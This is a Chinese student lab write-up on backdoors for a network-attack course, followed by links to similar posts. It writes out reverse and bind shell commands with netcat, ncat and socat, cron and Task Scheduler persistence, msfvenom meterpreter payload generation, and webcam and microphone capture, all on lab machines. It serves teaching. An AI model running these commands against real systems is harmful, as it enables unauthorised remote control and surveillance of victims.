20155226 Exp2 后门原理与实践

第一次实验博客交了蓝墨云未在博客园提交,链接

1.Windows获得Linux Shell

  • 在windows下,打开CMD,使用ipconfig指令查看本机IP

    如图:

  • 然后使用ncat.exe程序,ncat.exe -l -p 5226监听本机的5226端口

  • 在kali端,使用nc指令的-e选项,nc 192.168.56.1(主机ip) 5226(所设置的端口) -e /bin/sh反向连接Windows主机的5226端口:

如图:

  • 随后在windows端,就可以使用kali的命令行了

    如图:

2.Linux获得Windows Shell

  • 过程与之前的类似,先在Kali环境下用ifconfig查看IP
  • 如图:

使用nc指令,nc -l -p 5226,监听5226端口

然后,在windows,输入ncat.exe -e cmd.exe 192.168.35.128 5226

如图:

然后,在kali端,就可以使用windows的cmd了

如图:

3.使用netcat获取主机操作Shell,cron启动

先在Windows系统下,用ncat.exe -l -p 5226,监听5226端口

crontab -e指令编辑一条定时任务(输入3,选vim.basic)

在最后一行加入48 * * * * /bin/netcat 192.168.56.1 5226 -e /bin/sh,意思是在每个小时的第48分钟(为测试结果方便所选时间最好离现实时间较近)反向连接Windows主机的5226端口,就会启动cron

到时间后,便获得了Kali的shell,可以输入指令

如图:

4.使用socat获取主机操作Shell, 任务计划启动

  • 在Windows系统下,打开控制面板->管理工具->任务计划程序(可在控制面板直接搜索任务计划),创建任务,填写任务名称后,新建一个触发器

  • 下载安装socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files]

    在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5226..............

    .exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5226,同时把cmd.exe的stderr重定向到stdout上

  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行,或者可以右键单击,然后选择运行也可以

  • 然后在Kali环境下输入指令socat - tcp:192.168.56.1:5226,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5226端口,此时可以发现已经成功获得了一个cmd shell

5. 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.100 LPORT=5226 -f exe > 20155226.exe生成后门程序(LHOST=kali linux的IP)

如图:

  • 然后通过nc指令将生成的后门程序传送到Windows主机上

    • windows:ncat.exe -l 5226 > 20155226.exe
    * kali:```nc 192.168.1.100 5226 < 20155226.exe```
  • 在Kali上使用msfconsole指令进入msf控制台,set payload windows/meterpreter/reverse_tcp,使用监听模块,设置payload,设置反弹回连的IP和端口

  • 设置完成后,利用exploit,执行监听,在windows中,利用20155226.exe运行20155226.exe

    如图:

  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

6.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频
  • 使用webcam_snap指令可以使用摄像头进行拍照

    如图:

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?

    1. 我们在安装一些未知来源的应用软件时。
    2. 登录非法网页时。
    3. 打开未知对象发来的不安全邮件时。
  2. 例举你知道的后门如何启动起来(win及linux)的方式?

    windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序

    linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。

  3. Meterpreter有哪些给你映像深刻的功能?

    * 可以获取目标主机摄像头摄像头摄像头
    * 可以录音
    * 可以更改权限
  4. 如何发现自己有系统有没有被安装后门?

    • 一般的寻常的杀毒软件就可以查杀,比如我这次实验做的,一发送给主机就被360拦截了。
    • 至于隐藏的稍深一些的后门,例如与软件捆绑的后门,可以下载一些比较专业的监视软件,例如下载者监视器1.0、Regmon704.rar等进行检测。
    • 还可以用抓包工具分析可疑软件是否有可疑操作

彳亍口巴

20155226 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  2. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  6. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  7. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

随机推荐

  1. RaPC(rasterized polygon clipper): A discrete grid-based polygon clipping algorithm

    RaPC(rasterized polygon clipper)-A discrete grid-based polygon clipping algorithm This algorithm is ...

  2. iOS 开发多线程 —— NSOperation

    本文是根据文顶顶老师的博客学习而来,转载地址:http://www.cnblogs.com/wendingding/p/3809042.html 一.NSOperation简介 1.简单说明 NSOp ...

  3. CSS 实例之翻转图片

    具体效果图如下: 主要用到的技术除了3D翻转和定位 ,还用到了一个新的属性 backface-visibility:visable|hidden; 该属性主要是用来设定元素背面是否可见. 具体的步骤如 ...

  4. python的函数(三)

    1,函数多类型传值和冗余参数 2,递归函数 1,函数多类型传值和冗余参数 1.0,函数多类型传值 定义1个函数, def fun(x,y): return x+y 调用该函数print fun(1,2 ...

  5. windows10如何打开vhd文件

    本人电脑安装了Visual Studio 2017,但是由于项目需求需要Core SDK(2.0)的版本支持,也就是2017最新版.所以现在需要利用visual Studio 2017最新版本的安装包 ...

  6. 使用 Azure Active Directory 管理 Azure 中的 HPC Pack 群集

    Microsoft HPC Pack 2016 支持在 Azure 中部署 HPC Pack 群集的管理员将其与 Azure Active Directory (Azure AD) 集成. 请按照本文 ...

  7. 为 Azure Resource Manager 中的虚拟机设置 WinRM 访问权限

    Azure 服务管理中的 WinRM 与 Azure Resource Manager Note Azure 具有用于创建和处理资源的两个不同的部署模型:Resource Manager 和经典. 本 ...

  8. Oracle 密码失灵

    java.sql.SQLException: ORA-28001: 密碼已經屆滿 at oracle.jdbc.driver.DatabaseError.throwSqlException(Datab ...

  9. linux下取IP(正则)

    linux下取IP(正则) 常见方法: ifconfig eth0|grep "inet addr"|awk -F ":" '{print $2}'|awk ' ...

  10. 【转】Spring学习---为什么要用spring,springMVC

    [原文]https://www.toutiao.com/i6593182323095634445/ 首先,软件里有很多优秀的框架,有一种类型的框架,它的特点是建立在一个现有技术的基础上,提供和现有技术 ...